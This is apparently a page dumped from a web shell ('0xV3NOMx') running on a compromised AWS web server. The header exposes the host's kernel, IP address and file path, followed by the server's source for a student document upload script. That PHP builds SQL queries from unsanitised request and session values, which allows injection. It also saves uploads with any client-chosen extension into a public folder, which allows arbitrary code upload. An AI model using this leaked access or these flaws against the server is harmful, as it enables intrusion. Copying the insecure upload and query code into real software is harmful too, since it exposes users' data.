0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.119.134.196


Current Path : /proc/thread-self/root/var/www/html/orms-gug/src/
Upload File :
Current File : //proc/thread-self/root/var/www/html/orms-gug/src/uploaddocuments.php

<?php

function replaceChars($name)
{
	$spl_char = array("*","/","~","!","@","#","$","%","^","&",":",";","?","/","\\","_","-","'"," ","");
	$link_name = strtolower(str_replace($spl_char,"_",$name));
	return str_ireplace("__","_",$link_name);
}

function uploadUserDoc($aobj_context)
{	
	$aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC);
	session_start();
	$userid = $_SESSION['userid'];
	$dir_path=$aobj_context->main_src."student_photos/{$userid}";
	mkdir($dir_path);
	//chmod($dir_path,7777);
	$doc_id=trim($aobj_context->mobj_data["doc_id"]);	
	$file_id=$doc_id;
	$file_name=replaceChars(basename($_FILES[$file_id]['name']));
	//$file_ext=$path_arr['extension'];
	$arr['file_name']=$file_name;	
	if(isset($file_name) && $file_name != '')         
	{ 		
		$path_arr=pathinfo($_FILES[$file_id]['name']);
		$file_ext=$path_arr['extension'];
			
		$root_file_name=$dir_path."/{$doc_id}.".$file_ext;	
		$attachement_path="student_photos/{$userid}/{$doc_id}.".$file_ext;	
		if(move_uploaded_file($_FILES[$file_id]['tmp_name'],$root_file_name))
		{	
			$arr['path']=$attachement_path;					
			$arr['id']=$doc_id;					
			$arr['file_name']=$file_name;
			
			$query="delete from studdoc 
			where FFILENAME = '{$doc_id}' and fuserid = '{$userid}'";	
			$lobj_delete= $aobj_context->mobj_db->Execute($query);	 		
			
			$insert = "INSERT IGNORE INTO studdoc(fuserid, FFILENAME, fdocpath, fdate)
			values('{$userid}','{$doc_id}','{$attachement_path}',now())";	
			$lobj_insert = $aobj_context->mobj_db->Execute($insert);
			
			echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success");	
			return;  
		}
		else
		{
			$data="Moving {$file_name} failed";						
			echo $aobj_context->mobj_output->ToJSONEnvelope($data,-1,"failure");	
			return;
		}
	} 
	else
	{
		$data="File is empty, not moved";						
		echo $aobj_context->mobj_output->ToJSONEnvelope($data,-1,"failure");	
		return;
	}
}

function recurseRmdir($dir)
{
	$files = array_diff(scandir($dir), array('.','..'));
	foreach ($files as $file) 
	{
		(is_dir("$dir/$file")) ? recurseRmdir("$dir/$file") : unlink("$dir/$file");
	}
	return rmdir($dir);
}

function getDocumentsTable($aobj_context)
{ 		
	$aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC);
	session_start();
	$userid = $_SESSION['userid'];
	$dir_path=$aobj_context->main_src."/student_photos/{$userid}/";
	if($login_cnt>0)
	{
		recurseRmdir($dir_path);
		rmdir($dir_path);
	}
	
	$query5 = "SELECT md.FFILENAME AS int_code,md.fcertdesc AS filedesc,sd.fdocpath FROM masdoc md LEFT OUTER JOIN studdoc sd
	ON   md.FFILENAME = sd.FFILENAME  WHERE sd.FUSERID ='{$userid}'
	UNION
	SELECT md.FFILENAME AS int_code,md.fcertdesc AS filedesc,'' AS fdocpath FROM masdoc md LEFT OUTER JOIN studdoc sd
	ON   md.FFILENAME = sd.FFILENAME  WHERE md.FFILENAME NOT IN
	(SELECT md.FFILENAME FROM masdoc md LEFT OUTER JOIN studdoc sd
	ON   md.FFILENAME = sd.FFILENAME  WHERE sd.FUSERID ='{$userid}' ) ";
	$lobj_get_document_data= $aobj_context->mobj_db->GetAll($query5);
	$html = "";
	$sl	= 1;
	$html.='<tbody> ';
	foreach($lobj_get_document_data as $mk=>$mv)
	{
		$int_code = $mv['int_code'];
		$doc_type = $mv['int_code'];
		$attachment_path = $mv['fdocpath'];
		$FFILENAME = $mv['filedesc'];
		$file_name = $FFILENAME;
		$file_type_id = "{$int_code}";
		$att_id = "{$int_code}";
		$doc_file_path = $attachment_path;
		$html.='<tr><td>'.$sl.'</td><td>'.$file_name.'</td><td><input type="file" style="width:80px;"  id = "'.$att_id.'"  name = "'.$att_id.'"  onchange=uploadUserDoc("'.$att_id.'") /></td>';
		
		if(!empty($attachment_path))
		{
			$html.='<td id="attach_td_'.$int_code.'"><input type="hidden" id='.'"'.$att_id.'"'.' value="A" /><a style="color:#AB45F9; padding-right:5px;" href="'.$doc_file_path.'" target="_blank"><img src="images/file-attachment.jpg"/></a></td>';
		}
		else
		{
			$html.='<td id="attach_td_'.$int_code.'"><input type="hidden" id='.'"'.$att_id.'"'.' value="" />&nbsp;</td>';
		}
	 		
		$html.='</tr>';	$sl++;	
	}
	$html.='</tbody>';
	echo $aobj_context->mobj_output->ToJSONEnvelope($html,0,"success"); 			
	return;							
} 

?>